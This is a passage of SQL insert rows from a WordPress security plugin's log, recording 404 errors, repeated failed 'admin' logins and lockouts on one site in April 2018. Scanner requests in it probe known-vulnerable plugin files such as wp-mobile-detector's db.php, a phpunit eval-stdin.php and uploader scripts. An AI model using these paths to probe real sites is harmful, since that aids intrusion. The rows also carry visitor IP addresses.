(86459, 'four_oh_four', '404 Error', 3, '2018-04-29 17:25:57', '2018-04-29 22:25:57', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86460, 'four_oh_four', '404 Error', 3, '2018-04-29 17:28:02', '2018-04-29 22:28:02', '185.85.238.244', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86461, 'four_oh_four', '404 Error', 3, '2018-04-29 17:31:47', '2018-04-29 22:31:47', '185.85.239.195', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86462, 'four_oh_four', '404 Error', 3, '2018-04-29 17:52:21', '2018-04-29 22:52:21', '66.249.69.99', '', 0, '/ads.txt', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86463, 'four_oh_four', '404 Error', 3, '2018-04-29 20:12:23', '2018-04-30 01:12:23', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86464, 'four_oh_four', '404 Error', 3, '2018-04-29 20:12:24', '2018-04-30 01:12:24', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86465, 'four_oh_four', '404 Error', 3, '2018-04-29 20:12:26', '2018-04-30 01:12:26', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86466, 'four_oh_four', '404 Error', 3, '2018-04-29 20:12:27', '2018-04-30 01:12:27', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86467, 'four_oh_four', '404 Error', 3, '2018-04-29 20:22:39', '2018-04-30 01:22:39', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86468, 'four_oh_four', '404 Error', 3, '2018-04-29 20:33:10', '2018-04-30 01:33:10', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86469, 'four_oh_four', '404 Error', 3, '2018-04-29 20:44:58', '2018-04-30 01:44:58', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86470, 'four_oh_four', '404 Error', 3, '2018-04-29 20:49:38', '2018-04-30 01:49:38', '195.154.173.101', '', 0, '/wp-content/plugins/simple-ads-manager/js/slider/tmpl.js', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86471, 'four_oh_four', '404 Error', 3, '2018-04-29 20:49:41', '2018-04-30 01:49:41', '195.154.173.101', '', 0, '/wp-content/plugins/wp-mobile-detector/cache/db.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86472, 'four_oh_four', '404 Error', 3, '2018-04-29 20:49:44', '2018-04-30 01:49:44', '195.154.173.101', '', 0, '/wp-content/plugins/formcraft/file-upload/server/php/upload.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86473, 'four_oh_four', '404 Error', 3, '2018-04-29 20:49:52', '2018-04-30 01:49:52', '195.154.173.101', '', 0, '/wp-content/plugins/wp-symposium/server/php/jbUYPMriErOYzH.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86474, 'four_oh_four', '404 Error', 3, '2018-04-29 21:25:27', '2018-04-30 02:25:27', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86475, 'four_oh_four', '404 Error', 3, '2018-04-29 21:56:29', '2018-04-30 02:56:29', '185.86.164.104', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86476, 'four_oh_four', '404 Error', 3, '2018-04-29 22:23:40', '2018-04-30 03:23:40', '188.240.208.26', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86477, 'four_oh_four', '404 Error', 3, '2018-04-29 22:23:40', '2018-04-30 03:23:40', '188.240.208.26', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86478, 'four_oh_four', '404 Error', 3, '2018-04-29 22:26:37', '2018-04-30 03:26:37', '45.117.156.129', '', 0, '/', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:6:"p=2474";}'),
(86479, 'four_oh_four', '404 Error', 3, '2018-04-29 23:05:53', '2018-04-30 04:05:53', '185.86.164.109', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86480, 'four_oh_four', '404 Error', 3, '2018-04-29 23:06:35', '2018-04-30 04:06:35', '66.249.69.99', '', 0, '/who-we-are/4154626692/www.ThrivingBusinessPartners.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86481, 'four_oh_four', '404 Error', 3, '2018-04-29 23:06:44', '2018-04-30 04:06:44', '66.249.69.96', '', 0, '/who-we-are/4154626692/mariajgarcia@verizon.net', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86482, 'four_oh_four', '404 Error', 3, '2018-04-29 23:11:02', '2018-04-30 04:11:02', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86483, 'four_oh_four', '404 Error', 3, '2018-04-29 23:16:15', '2018-04-30 04:16:15', '185.85.191.196', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86484, 'four_oh_four', '404 Error', 3, '2018-04-29 23:17:14', '2018-04-30 04:17:14', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86485, 'four_oh_four', '404 Error', 3, '2018-04-29 23:43:49', '2018-04-30 04:43:49', '185.86.164.103', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86486, 'four_oh_four', '404 Error', 3, '2018-04-29 23:48:43', '2018-04-30 04:48:43', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86487, 'four_oh_four', '404 Error', 3, '2018-04-29 23:53:23', '2018-04-30 04:53:23', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86488, 'four_oh_four', '404 Error', 3, '2018-04-29 23:57:20', '2018-04-30 04:57:20', '216.244.66.234', '', 0, '/blog/page/44/zolotoslot.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86489, 'four_oh_four', '404 Error', 3, '2018-04-30 00:13:07', '2018-04-30 05:13:07', '216.244.66.234', '', 0, '/blog/page/44/zolotoslot.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86490, 'four_oh_four', '404 Error', 3, '2018-04-30 00:24:39', '2018-04-30 05:24:39', '185.86.164.107', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86491, 'four_oh_four', '404 Error', 3, '2018-04-30 00:40:45', '2018-04-30 05:40:45', '185.86.164.103', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86492, 'four_oh_four', '404 Error', 3, '2018-04-30 01:03:27', '2018-04-30 06:03:27', '103.31.100.244', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86493, 'four_oh_four', '404 Error', 3, '2018-04-30 01:09:08', '2018-04-30 06:09:08', '103.99.0.218', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86494, 'four_oh_four', '404 Error', 3, '2018-04-30 01:09:09', '2018-04-30 06:09:09', '103.99.0.218', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86495, 'four_oh_four', '404 Error', 3, '2018-04-30 01:28:25', '2018-04-30 06:28:25', '185.86.164.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86496, 'four_oh_four', '404 Error', 3, '2018-04-30 01:40:17', '2018-04-30 06:40:17', '185.85.191.196', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86497, 'four_oh_four', '404 Error', 3, '2018-04-30 01:47:05', '2018-04-30 06:47:05', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86498, 'four_oh_four', '404 Error', 3, '2018-04-30 02:07:10', '2018-04-30 07:07:10', '185.85.190.132', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86499, 'four_oh_four', '404 Error', 3, '2018-04-30 03:02:50', '2018-04-30 08:02:50', '185.86.164.109', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86500, 'four_oh_four', '404 Error', 3, '2018-04-30 03:16:56', '2018-04-30 08:16:56', '43.228.156.179', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86501, 'four_oh_four', '404 Error', 3, '2018-04-30 03:18:28', '2018-04-30 08:18:28', '185.86.164.108', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86502, 'four_oh_four', '404 Error', 3, '2018-04-30 03:33:01', '2018-04-30 08:33:01', '185.86.164.101', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86503, 'four_oh_four', '404 Error', 3, '2018-04-30 03:39:44', '2018-04-30 08:39:44', '185.85.239.195', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86504, 'four_oh_four', '404 Error', 3, '2018-04-30 03:49:37', '2018-04-30 08:49:37', '118.102.69.23', '', 0, '/wp-content/plugins/ready-ecommerce/templates/standard/img/tb-close.png', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:0:"";}'),
(86505, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-30 03:55:33', '2018-04-30 08:55:33', '85.248.227.164', 'admin', 0, '', '', 'a:0:{}'),
(86506, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-30 03:55:33', '2018-04-30 08:55:33', '85.248.227.164', 'admin', 0, '', '', 'a:0:{}'),
(86507, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-30 03:55:33', '2018-04-30 08:55:33', '85.248.227.164', 'admin', 0, '', '', 'a:0:{}'),
(86508, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-30 03:55:33', '2018-04-30 08:55:33', '85.248.227.164', 'admin', 0, '', '', 'a:0:{}'),
(86509, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-30 03:55:33', '2018-04-30 08:55:33', '85.248.227.164', 'admin', 0, '', '', 'a:0:{}'),
(86510, 'lockout', 'Host or User Lockout', 10, '2018-04-30 03:55:33', '2018-04-30 08:55:33', '85.248.227.164', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-30 04:10:33";s:11:"expires_gmt";s:19:"2018-04-30 09:10:33";s:4:"type";s:11:"brute_force";}'),
(86511, 'four_oh_four', '404 Error', 3, '2018-04-30 03:57:29', '2018-04-30 08:57:29', '163.172.197.129', '', 0, '/global-belief-relief/wysiwyg/tiny_mce/plugins/ccSimpleUploader/uploader.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86512, 'four_oh_four', '404 Error', 3, '2018-04-30 04:06:15', '2018-04-30 09:06:15', '185.86.164.104', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86513, 'four_oh_four', '404 Error', 3, '2018-04-30 04:38:20', '2018-04-30 09:38:20', '163.172.197.129', '', 0, '/global-belief-relief/tinymce/plugins/ccSimpleUploader/uploader.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86514, 'four_oh_four', '404 Error', 3, '2018-04-30 04:44:49', '2018-04-30 09:44:49', '185.86.164.107', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86515, 'four_oh_four', '404 Error', 3, '2018-04-30 04:49:27', '2018-04-30 09:49:27', '185.86.164.107', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86516, 'four_oh_four', '404 Error', 3, '2018-04-30 04:52:14', '2018-04-30 09:52:14', '144.217.210.86', '', 0, '/', '', 'a:1:{s:12:"query_string";s:8:"author=1";}'),
(86517, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-30 04:52:16', '2018-04-30 09:52:16', '144.217.210.86', 'admin', 0, '', '', 'a:0:{}'),
(86518, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-30 04:52:16', '2018-04-30 09:52:16', '144.217.210.86', 'admin', 0, '', '', 'a:0:{}'),
(86519, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-30 04:52:16', '2018-04-30 09:52:16', '144.217.210.86', 'admin', 0, '', '', 'a:0:{}'),
(86520, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-30 04:52:16', '2018-04-30 09:52:16', '144.217.210.86', 'admin', 0, '', '', 'a:0:{}'),
(86521, 'lockout', 'Host or User Lockout', 10, '2018-04-30 04:52:16', '2018-04-30 09:52:16', '144.217.210.86', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-30 05:07:16";s:11:"expires_gmt";s:19:"2018-04-30 10:07:16";s:4:"type";s:11:"brute_force";}'),
(86522, 'four_oh_four', '404 Error', 3, '2018-04-30 04:56:42', '2018-04-30 09:56:42', '62.210.149.69', '', 0, '/wp/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86523, 'four_oh_four', '404 Error', 3, '2018-04-30 04:56:44', '2018-04-30 09:56:44', '62.210.149.69', '', 0, '/WP/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86524, 'four_oh_four', '404 Error', 3, '2018-04-30 04:56:49', '2018-04-30 09:56:49', '62.210.149.69', '', 0, '/wordpress/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86525, 'four_oh_four', '404 Error', 3, '2018-04-30 04:56:56', '2018-04-30 09:56:56', '62.210.149.69', '', 0, '/site/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86526, 'four_oh_four', '404 Error', 3, '2018-04-30 04:56:59', '2018-04-30 09:56:59', '62.210.149.69', '', 0, '/website/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86527, 'four_oh_four', '404 Error', 3, '2018-04-30 05:05:47', '2018-04-30 10:05:47', '185.85.239.195', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86528, 'four_oh_four', '404 Error', 3, '2018-04-30 05:15:13', '2018-04-30 10:15:13', '66.249.69.102', '', 0, '/who-we-are/4154626692/www.RadiantClarity.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86529, 'four_oh_four', '404 Error', 3, '2018-04-30 05:18:03', '2018-04-30 10:18:03', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86530, 'four_oh_four', '404 Error', 3, '2018-04-30 05:18:04', '2018-04-30 10:18:04', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86531, 'four_oh_four', '404 Error', 3, '2018-04-30 05:18:07', '2018-04-30 10:18:07', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86532, 'four_oh_four', '404 Error', 3, '2018-04-30 05:18:08', '2018-04-30 10:18:08', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86533, 'four_oh_four', '404 Error', 3, '2018-04-30 05:40:32', '2018-04-30 10:40:32', '185.86.164.103', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86534, 'four_oh_four', '404 Error', 3, '2018-04-30 06:02:43', '2018-04-30 11:02:43', '185.220.101.8', '', 0, '/global-belief-relief/OgNjZ/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86535, 'four_oh_four', '404 Error', 3, '2018-04-30 06:05:40', '2018-04-30 11:05:40', '207.46.13.142', '', 0, '/is-getting-out-of-hand-the-pontiac-g6-when-i-first-came-in/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86536, 'four_oh_four', '404 Error', 3, '2018-04-30 06:08:09', '2018-04-30 11:08:09', '163.172.197.129', '', 0, '/global-belief-relief/tiny_mce/plugins/ccSimpleUploader/uploader.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86537, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-30 06:35:46', '2018-04-30 11:35:46', '176.10.99.200', 'admin', 0, '', '', 'a:0:{}'),
(86538, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-30 06:35:46', '2018-04-30 11:35:46', '176.10.99.200', 'admin', 0, '', '', 'a:0:{}'),
(86539, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-30 06:35:46', '2018-04-30 11:35:46', '176.10.99.200', 'admin', 0, '', '', 'a:0:{}'),
(86540, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-30 06:35:46', '2018-04-30 11:35:46', '176.10.99.200', 'admin', 0, '', '', 'a:0:{}'),
(86541, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-30 06:35:46', '2018-04-30 11:35:46', '176.10.99.200', 'admin', 0, '', '', 'a:0:{}'),
(86542, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-30 06:35:46', '2018-04-30 11:35:46', '176.10.99.200', 'admin', 0, '', '', 'a:0:{}'),
(86543, 'lockout', 'Host or User Lockout', 10, '2018-04-30 06:35:46', '2018-04-30 11:35:46', '176.10.99.200', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-30 06:50:46";s:11:"expires_gmt";s:19:"2018-04-30 11:50:46";s:4:"type";s:11:"brute_force";}'),
(86544, 'four_oh_four', '404 Error', 3, '2018-04-30 06:37:32', '2018-04-30 11:37:32', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86545, 'four_oh_four', '404 Error', 3, '2018-04-30 06:54:36', '2018-04-30 11:54:36', '196.196.220.69', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86546, 'four_oh_four', '404 Error', 3, '2018-04-30 06:54:37', '2018-04-30 11:54:37', '196.196.220.69', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86547, 'four_oh_four', '404 Error', 3, '2018-04-30 07:11:39', '2018-04-30 12:11:39', '126.236.197.6', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86548, 'four_oh_four', '404 Error', 3, '2018-04-30 07:52:27', '2018-04-30 12:52:27', '185.85.190.132', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86549, 'four_oh_four', '404 Error', 3, '2018-04-30 07:56:22', '2018-04-30 12:56:22', '185.86.164.107', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86550, 'four_oh_four', '404 Error', 3, '2018-04-30 08:03:21', '2018-04-30 13:03:21', '185.86.167.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86551, 'four_oh_four', '404 Error', 3, '2018-04-30 08:34:10', '2018-04-30 13:34:10', '163.172.197.129', '', 0, '/global-belief-relief/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86552, 'four_oh_four', '404 Error', 3, '2018-04-30 08:56:02', '2018-04-30 13:56:02', '185.85.190.132', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86553, 'four_oh_four', '404 Error', 3, '2018-04-30 09:07:49', '2018-04-30 14:07:49', '185.86.164.99', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86554, 'four_oh_four', '404 Error', 3, '2018-04-30 09:14:42', '2018-04-30 14:14:42', '142.252.248.250', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86555, 'four_oh_four', '404 Error', 3, '2018-04-30 09:14:43', '2018-04-30 14:14:43', '142.252.248.250', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86556, 'four_oh_four', '404 Error', 3, '2018-04-30 09:15:59', '2018-04-30 14:15:59', '185.86.164.108', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86557, 'four_oh_four', '404 Error', 3, '2018-04-30 09:33:43', '2018-04-30 14:33:43', '104.220.105.69', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86558, 'four_oh_four', '404 Error', 3, '2018-04-30 09:33:44', '2018-04-30 14:33:44', '104.220.105.69', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86559, 'four_oh_four', '404 Error', 3, '2018-04-30 09:33:46', '2018-04-30 14:33:46', '104.220.105.69', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86560, 'four_oh_four', '404 Error', 3, '2018-04-30 09:33:47', '2018-04-30 14:33:47', '104.220.105.69', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86561, 'four_oh_four', '404 Error', 3, '2018-04-30 09:34:31', '2018-04-30 14:34:31', '46.118.115.22', '', 0, '/wp-content/plugins/wp-mobile-detector/cache/db.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86562, 'four_oh_four', '404 Error', 3, '2018-04-30 09:34:33', '2018-04-30 14:34:33', '46.118.115.22', '', 0, '/wp-content/plugins/wp-symposium/server/php/aJRQmPiRBimbVY.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86563, 'four_oh_four', '404 Error', 3, '2018-04-30 09:34:54', '2018-04-30 14:34:54', '59.153.96.116', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86564, 'four_oh_four', '404 Error', 3, '2018-04-30 09:55:31', '2018-04-30 14:55:31', '104.220.105.69', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86565, 'four_oh_four', '404 Error', 3, '2018-04-30 09:55:31', '2018-04-30 14:55:31', '104.220.105.69', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86566, 'four_oh_four', '404 Error', 3, '2018-04-30 09:55:34', '2018-04-30 14:55:34', '104.220.105.69', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86567, 'four_oh_four', '404 Error', 3, '2018-04-30 09:55:35', '2018-04-30 14:55:35', '104.220.105.69', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86568, 'four_oh_four', '404 Error', 3, '2018-04-30 10:12:24', '2018-04-30 15:12:24', '185.85.191.196', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86569, 'four_oh_four', '404 Error', 3, '2018-04-30 10:12:50', '2018-04-30 15:12:50', '103.214.63.70', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86570, 'four_oh_four', '404 Error', 3, '2018-04-30 10:15:37', '2018-04-30 15:15:37', '185.86.164.109', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86571, 'four_oh_four', '404 Error', 3, '2018-04-30 10:23:33', '2018-04-30 15:23:33', '185.86.164.109', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86572, 'four_oh_four', '404 Error', 3, '2018-04-30 10:28:10', '2018-04-30 15:28:10', '85.103.209.104', '', 0, '/administrator/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86573, 'four_oh_four', '404 Error', 3, '2018-04-30 10:28:12', '2018-04-30 15:28:12', '85.103.209.104', '', 0, '/admin.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86574, 'four_oh_four', '404 Error', 3, '2018-04-30 10:28:14', '2018-04-30 15:28:14', '85.103.209.104', '', 0, '/bitrix/admin/', '', 'a:1:{s:12:"query_string";s:7:"lang=en";}'),
(86575, 'four_oh_four', '404 Error', 3, '2018-04-30 10:28:15', '2018-04-30 15:28:15', '85.103.209.104', '', 0, '/admin/login.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86576, 'four_oh_four', '404 Error', 3, '2018-04-30 10:28:16', '2018-04-30 15:28:16', '85.103.209.104', '', 0, '/admin/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86577, 'four_oh_four', '404 Error', 3, '2018-04-30 10:28:18', '2018-04-30 15:28:18', '85.103.209.104', '', 0, '/user/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86578, 'four_oh_four', '404 Error', 3, '2018-04-30 10:35:26', '2018-04-30 15:35:26', '146.185.223.240', '', 0, '/wp-content/plugins/wp-mobile-detector/cache/db.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86579, 'four_oh_four', '404 Error', 3, '2018-04-30 10:35:30', '2018-04-30 15:35:30', '146.185.223.240', '', 0, '/wp-content/plugins/wp-symposium/server/php/JdliZIScoEuCgT.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86580, 'four_oh_four', '404 Error', 3, '2018-04-30 10:41:15', '2018-04-30 15:41:15', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86581, 'four_oh_four', '404 Error', 3, '2018-04-30 10:43:06', '2018-04-30 15:43:06', '122.176.146.188', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86582, 'four_oh_four', '404 Error', 3, '2018-04-30 10:53:47', '2018-04-30 15:53:47', '41.103.137.202', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86583, 'four_oh_four', '404 Error', 3, '2018-04-30 10:55:07', '2018-04-30 15:55:07', '85.103.209.104', '', 0, '/administrator/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86584, 'four_oh_four', '404 Error', 3, '2018-04-30 10:55:08', '2018-04-30 15:55:08', '85.103.209.104', '', 0, '/admin.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86585, 'four_oh_four', '404 Error', 3, '2018-04-30 10:55:12', '2018-04-30 15:55:12', '85.103.209.104', '', 0, '/bitrix/admin/', '', 'a:1:{s:12:"query_string";s:7:"lang=en";}'),
(86586, 'four_oh_four', '404 Error', 3, '2018-04-30 10:55:14', '2018-04-30 15:55:14', '85.103.209.104', '', 0, '/admin/login.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86587, 'four_oh_four', '404 Error', 3, '2018-04-30 10:55:15', '2018-04-30 15:55:15', '85.103.209.104', '', 0, '/admin/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86588, 'four_oh_four', '404 Error', 3, '2018-04-30 10:55:16', '2018-04-30 15:55:16', '85.103.209.104', '', 0, '/user/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86589, 'four_oh_four', '404 Error', 3, '2018-04-30 11:23:50', '2018-04-30 16:23:50', '146.185.223.240', '', 0, '/wp-content/plugins/wp-mobile-detector/cache/db.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86590, 'four_oh_four', '404 Error', 3, '2018-04-30 11:23:54', '2018-04-30 16:23:54', '146.185.223.240', '', 0, '/wp-content/plugins/wp-symposium/server/php/oOvJtEBwhmDNLS.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86591, 'four_oh_four', '404 Error', 3, '2018-04-30 12:00:26', '2018-04-30 17:00:26', '185.86.164.104', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86592, 'four_oh_four', '404 Error', 3, '2018-04-30 12:10:55', '2018-04-30 17:10:55', '212.227.119.164', '', 0, '/js/mage/cookies.js', 'clearyourbeliefs.com', 'a:1:{s:12:"query_string";s:0:"";}'),
(86593, 'four_oh_four', '404 Error', 3, '2018-04-30 12:12:32', '2018-04-30 17:12:32', '185.86.164.100', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86594, 'four_oh_four', '404 Error', 3, '2018-04-30 12:32:49', '2018-04-30 17:32:49', '146.185.223.240', '', 0, '/wp-content/plugins/wp-mobile-detector/cache/db.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86595, 'four_oh_four', '404 Error', 3, '2018-04-30 12:32:54', '2018-04-30 17:32:54', '146.185.223.240', '', 0, '/wp-content/plugins/wp-symposium/server/php/USXGbyhzJklHGP.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86596, 'four_oh_four', '404 Error', 3, '2018-04-30 12:33:42', '2018-04-30 17:33:42', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86597, 'four_oh_four', '404 Error', 3, '2018-04-30 12:33:43', '2018-04-30 17:33:43', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86598, 'four_oh_four', '404 Error', 3, '2018-04-30 12:33:45', '2018-04-30 17:33:45', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86599, 'four_oh_four', '404 Error', 3, '2018-04-30 12:33:46', '2018-04-30 17:33:46', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
